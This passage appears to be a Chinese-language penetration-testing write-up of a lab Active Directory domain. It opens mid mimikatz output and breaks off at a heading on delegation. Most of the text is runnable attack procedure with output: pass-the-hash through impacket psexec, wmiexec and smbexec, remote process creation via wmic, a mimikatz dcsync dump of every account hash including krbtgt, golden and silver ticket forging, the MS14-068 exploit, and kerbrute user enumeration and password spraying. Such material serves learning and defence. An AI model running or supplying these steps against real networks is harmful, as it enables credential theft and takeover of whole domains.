  |  LUID 0 ; 22668132 (00000000:0159e364)
  \_ msv1_0   - data copy @ 000001F6C8FFE6F0 : OK !
  \_ kerberos - data copy @ 000001F6C8E5ED28
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 000001F6C8465DC8 (32) -> null

会弹出来个cmd,这个cmd是域内主机的cmd,不是域控的cmd。

可以直接连接该主机、查看目录文件等操作

连接域控:net use \\192.168.188.100
查看文件目录:dir \\192.168.188.100\c$

查看目标开放的共享

C:\Users>net view \\192.168.188.100
在 \\192.168.188.100 的共享资源
共享名    类型  使用为  注释

-------------------------------------------------------------------------------
NETLOGON  Disk          Logon server share
SYSVOL    Disk          Logon server share
命令成功完成。

只有域控才会有下面两个共享目录:

NETLOGON      Disk          Logon server share
SYSVOL        Disk          Logon server share

删除链接

net use \\192.168.188.100 /del /y

C:\Users>net use \\192.168.188.100 /del /y
\\192.168.188.100 已经删除

copy 命令

##把当前机器C盘下的1.txt文件拷贝到目标桌面
copy 1.txt \\192.168.188.100\c$\users\administrator\desktop\

image-20220318185354157

## 吧目标机器上的pass.txt拷贝到本地
coyp \\192.168.188.100\c$\users\administrator\desktop\pass.txt

查看内容

## 查看目标桌面1.txt文件内容
type \\192.168.188.100\c$\users\administrator\desktop\1.txt

image-20220318185531211

除此之外还有psexec,wmiexec,rpcdump等等,(之后再写)

PTH(Pass The Hash)哈希传递攻击手法与防范

psexec

这里的和上面的那个psexec不一样,这个是impacket套装里的

psexec.exe Administrator@192.168.188.100 -hashes 00000000000000000000000000000000:520126a03f5d5a8d836f1c4f34ede7ce
or
psexec.exe Administrator@192.168.188.100 -hashes :520126a03f5d5a8d836f1c4f34ede7ce

image-20220319161231967

wmiexec

wmiexec.exe -hashes :520126a03f5d5a8d836f1c4f34ede7ce ghost/dc@192.168.188.100 "ipconfig"

wmiexec.exe -hashes :520126a03f5d5a8d836f1c4f34ede7ce ghost/dc@192.168.188.100

image-20220319160157984

smbexec

smbexec.exe  -hashes :520126a03f5d5a8d836f1c4f34ede7ce ghost/dc@192.168.188.100

image-20220319160656572

WMI

WMI以CIMOM为基础,CIMOM即公共信息模型对象管理器(Common Information Model Object Manager),是一个描述操作系统构成单元的对象数据库,为MMC和脚本程序提供了一个访问操作系统构成单元的公共接口。

查询进程信息
wmic /node:192.168.188.100 /user:administrator /password:Admin123! process list brief

image-20220319165203798

远程创建进程
wmic /node:192.168.188.100 /user:administrator /password:Admin123! process call create "cmd.exe /c ipconfig > C:\result.txt"

image-20220319165338212

wmiexec

上面写过了。。。

wmiexec.exe -hashes :520126a03f5d5a8d836f1c4f34ede7ce ghost/dc@192.168.188.100

image-20220319165549388

PTT(Pass the ticket)

黄金票据

Golden Ticket(下面称为金票)是通过伪造的TGT(Ticket Granting Ticket),因为只要有了高权限的TGT,那么就可以发送给TGS换取任意服务的ST。可以说有了金票就有了域内的最高权限。

条件:

1、域名称

2、域的 SID 值

3、域的 KRBTGT 账号的 HASH

4、伪造任意用户名

得到kratgr的hash:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::dcsync /domain:ghost.com /all /csv
[DC] 'ghost.com' will be the domain
[DC] 'WIN-4JS3YOGGQ2T.ghost.com' will be the DC server
[DC] Exporting domain 'ghost.com'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1001    WIN-4JS3YOGGQ2T$        b443a0863dfb6f394b46983d0d795fb6        532480
1104    DM_WIN2003$     13e19dba1a1ad144d9bced3585afa9a9        4096
500     Administrator   520126a03f5d5a8d836f1c4f34ede7ce        512
1000    DC      520126a03f5d5a8d836f1c4f34ede7ce        544
502     krbtgt  a5269d41b184a97adc9b991f2ee21f12        514
1105    DM_WINXP$       5469d97f136d8662f65377f3ea8e4835        528384
1107    yutao   520126a03f5d5a8d836f1c4f34ede7ce        66048
1109    yutaowin10      520126a03f5d5a8d836f1c4f34ede7ce        66048
1108    DM_WIN10$       bc3746c7020c2c97eac589107a57790f        4096
1110    DM_WIN10_2$     aa5910b813ef7a8784d7522dad99ee07        4096
mimikatz # lsadump::dcsync /domain:ghost.com /user:krbtgt
[DC] 'ghost.com' will be the domain
[DC] 'WIN-4JS3YOGGQ2T.ghost.com' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 2022/3/16 18:25:33
Object Security ID   : S-1-5-21-1238213221-2393825874-2881136966-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: a5269d41b184a97adc9b991f2ee21f12
    ntlm- 0: a5269d41b184a97adc9b991f2ee21f12
    lm  - 0: dadc5e38f4551dd9bd6f8673528f3d6a

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : GHOST.COMkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : da6374753cb6f5e191265a283115ced1fe1d2c5e5091d60093903cb90ef67fb7
      aes128_hmac       (4096) : 777c080c663f51196b554d5348ee8123
      des_cbc_md5       (4096) : 5e83f83776ae8a1a
      des_cbc_crc       (4096) : 5e83f83776ae8a1a
      rc4_plain         (4096) : a5269d41b184a97adc9b991f2ee21f12

* Primary:Kerberos *
    Default Salt : GHOST.COMkrbtgt
    Credentials
      des_cbc_md5       : 5e83f83776ae8a1a
      des_cbc_crc       : 5e83f83776ae8a1a
      rc4_plain         : a5269d41b184a97adc9b991f2ee21f12

* Packages *
    Kerberos-Newer-Keys

* Primary:WDigest *
    01  b56b310c7d4d84d51763197cc777e236
    02  f11fc690746ff0c5017fbb804a5afadb
    03  1284d4bd47f80c75715883ecae93aee3
    04  b56b310c7d4d84d51763197cc777e236
    05  f11fc690746ff0c5017fbb804a5afadb
    06  f0858287a155ee5ea15271dca0c480c3
    07  b56b310c7d4d84d51763197cc777e236
    08  bc8cf0c0bb41ee11fd93ce726577cd2e
    09  bc8cf0c0bb41ee11fd93ce726577cd2e
    10  053d15785d6b8e58659321a0c0bbe730
    11  910f26088b80677ff20523ae2f570ad2
    12  bc8cf0c0bb41ee11fd93ce726577cd2e
    13  37dca035e5d9ce4b7539b40dd4a3b711
    14  910f26088b80677ff20523ae2f570ad2
    15  c01bc6cc7073767ae9332d6948012efb
    16  c01bc6cc7073767ae9332d6948012efb
    17  5bef1b58b30a684217b555a9c694b018
    18  c7ddf9a29f31081a0c2c59f0ba887591
    19  6ed3c0509d5ed0b11be6d3cb7d9eec89
    20  2230919d6c19fdc4794a4d4cbf08cbcc
    21  f5e434234d81d0ba2362f17a8b4a61a0
    22  f5e434234d81d0ba2362f17a8b4a61a0
    23  4cf7197a9331618814144057e85b32b6
    24  ada6252d89f49e2cc822fb2545c8a4ac
    25  ada6252d89f49e2cc822fb2545c8a4ac
    26  55c19bbc0da0e9ae00a609c755da8ef5
    27  9df3396f69d865ef7b7fabdd30e5c225
    28  b8685ccf3967652956f90dd8c912dd9f
    29  534307dab20bfd1901a972ed1196c351

利用 mimikatz 生成金票生成.kirbi 文件并保存:

mimikatz.exe "kerberos::golden /admin:new_user_gold /domain:ghost.com /sid:S-1-5-21-1238213221-2393825874-2881136966-502 /krbtgt:a5269d41b184a97adc9b991f2ee21f12 /ticket:ticket.kirbi" exit

/admin:伪造的用户名
/domain:域名称
/sid:SID 值,注意是去掉最后一个-后面的值
/krbtgt:krbtgt 的 HASH 值
/ticket:生成的票据名称 

image-20220318200338986

登录域内普通用户,通过 mimikatz 中的 kerberos::ptt 功能将ticket.kirbi 导入内存中。

导入票据之前访问域控:

image-20220318200449833

导入:

mimikatz # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz # kerberos::ptt C:\Users\yutaowin10\Desktop\Tool\mimikatz\ticket.kirbi

* File: 'C:\Users\yutaowin10\Desktop\Tool\mimikatz\ticket.kir

再次访问域控即可成功。

白银票据

Silver Tickets(下面称银票)就是伪造的ST(Service Ticket),因为在TGT已经在PAC里限定了给Client授权的服务(通过SID的值),所以银票只能访问指定服务。

1.不需要与 KDC 进行交互

2.需要 server 的 NTLM hash

mimikatz:

privilege::debug
sekurlsa::logonpasswords

image-20220318202007613

kerberos::golden /domain:ghost.com /sid:S-1-5-21-1238213221-2393825874-2881136966-500 /target:WIN-4JS3YOGGQ2T.ghost.com /service:cifs /rc4:520126a03f5d5a8d836f1c4f34ede7ce /user:new_user_gold /ptt

/domain
/sid
/target:目标服务器的域名全称,此处为域控的全称
/service:目标服务器上面的kerberos服务,此处为cifs
/rc4:计算机账户的NTLM hash,域控主机的计算机账户
/user:要伪造的用户名

此时可以成功访问域控上的文件共享

关于黄金票据和白银票据的一些区别:

1.访问权限不同
  • Golden Ticket: 伪造TGT,可以获取任何Kerberos服务权限
  • Silver Ticket: 伪造TGS,只能访问指定的服务
2.加密方式不同
  • Golden Ticket 由Kerberos的Hash—> krbtgt加密
  • Silver Ticket 由服务器端密码的Hash值—> master key 加密
3.认证流程不同
  • Golden Ticket 的利用过程需要访问域控(KDC)
  • Silver Ticket 可以直接跳过 KDC 直接访问对应的服务器

MS14-068

能够将任意一台域机器提升成域控相关权限

利用条件:

  • 小于2012R2的域控没有打KB3011780,高版本默认集成
  • 无论工作组、域,高低权限都可以使用生成的票据进行攻击
  • 域账户使用时需要klist purge清除票据

环境:

域控:2008,192.168.188.100,主机名:WIN-4JS3YOGGQ2T

域成员:192.168.188.104 ,yutaowin10 ,Admin123!

获取域用户的sid:

image-20220318194110678

直接生成票据:

MS14-068.exe -u yutaowin10@ghost.com -s S-1-5-21-1238213221-2393825874-2881136966-1109 -d 192.168.188.100 -p Admin123!

使用生成的票据:

kerberos::ptc TGT_yutaowin10@ghost.com.ccache

通过域控的主机名访问:

dir \\WIN-4JS3YOGGQ2T\c$

域外用户枚举

在域外也能和域进行交互的原因,是利用了kerberos协议认证中的AS-REQ阶段。只要我们能够访问域控88(kerberos服务)端口,就可以通过这种方式去枚举用户名并且进行kerberos协议的暴力破解了!

Kerbrute使用的是kerberos pre-auth协议,不会产生大量的日志 (4625 - An account failed to log on),但是会产生以下日志:

  • 口令验证成功时产生日志 (4768 - A Kerberos authentication ticket (TGT) was requested)
  • 口令验证失败时产生日志 (4771 - Kerberos pre-authentication failed)
攻击方法
kerbrute_windows_amd64.exe

kerbrute_windows_amd64.exe

在这里我们需要获取dc的ip,域名。将想要爆破的用户放入user.txt表中,这样就可以获取到了!

kerbrute_windows_amd64.exe userenum --dc 192.168.188.100 -d ghost.com user.txt

image-20220318191443842

之后爆破

kerbrute_windows_amd64.exe passwordspray -d 192.168.188.100 -d ghost.com Admin123!

image-20220318191719021

PY版本 pyKerbrute

pyKerbrute

不演示了,爆破用户:

python2 EnumADUser.py 192.168.188.100 ghost.com user.txt tcp
python2 EnumADUser.py 192.168.188.100 ghost.com user.txt udp

口令爆破:

##明文
python2 ADPwdSpray.py 192.168.188.100 ghost.com user.txt clearpassword Admin123! tcp

##hash
python2 ADPwdSpray.py 192.168.188.100 ghost.com user.txt ntlmhash aaaaaaaaaaaaaaaaaaaa(hash) udp

参考:

https://mp.weixin.qq.com/s/-V1gEpdsUExwU5Fza2YzrA
https://mp.weixin.qq.com/s/vYeR9FDRUfN2ZczmF68vZQ
https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247496592&idx=2&sn=3805d213ba1013e320f48169516c2ca3&chksm=e91523aade62aabc21ebca36a5216f63ec0d4c61e3dd1b4632c10adbb85dfde07e6897897fa5&scene=21#wechat_redirect
https://blog.csdn.net/weixin_41598660/article/details/109152077
https://xz.aliyun.com/t/7724#toc-4
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
http://hackergu.com/ad-information-search-powerview/
https://www.freebuf.com/news/173366.html
https://www.cnblogs.com/mrhonest/p/13372203.html
https://payloads.online/scripts/Invoke-DomainPasswordSpray.txt
https://github.com/dafthack/DomainPasswordSpray
https://blog.csdn.net/qq_36119192/article/details/105088239
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_amd64.exe

SPN 扫描

SPN全程 Service Principal Names,是服务器上所运行服务的唯一标识,每个使用kerberos认证的服务都需要一个SPN。 SPN分为两种,一种注册在AD的机器账户下(Computers)下,另一种注册在域用户账户(Users)下 当一个服务的权限为Local System或Network Service,则SPN注册在机器账户(Computers)下 当一个服务的权限为一个域用户,则SPN注册在域用户账户(Users)下

SPN扫描能让我们更快的发现在域内运行的服务,并且很难被发现

SPN格式

serviceclass/host:port/servicename

说明:

  • serviceclass可以理解为服务的名称,常见的有www,ldap,SMTP,DNS,HOST等
  • host有两种形式,FQDN和NetBIOS名,例如server01.test.com和server01
  • 如果服务运行在默认端口上,则端口号(port)可以省略

SPN 查询

查看当前域内的所有SPN:

setspn.exe -q */*

查询具体域所有SPN:

image-20220319170505083

以CN开头的每一行代表一个账户,下面的信息是与之关联的SPN 对于上面的输出数据,机器账户(Computers)为:

CN=WIN-4JS3YOGGQ2T,OU=Domain Controllers,DC=ghost,DC=com
CN=DM_WIN2003,CN=Computers,DC=ghost,DC=com
CN=DM_WINXP,CN=Computers,DC=ghost,DC=com
CN=DM_WIN10,CN=Computers,DC=ghost,DC=com
CN=DM_WIN10_2,CN=Computers,DC=ghost,DC=com

域用户:

CN=krbtgt,CN=Users,DC=ghost,DC=com

域委派

0%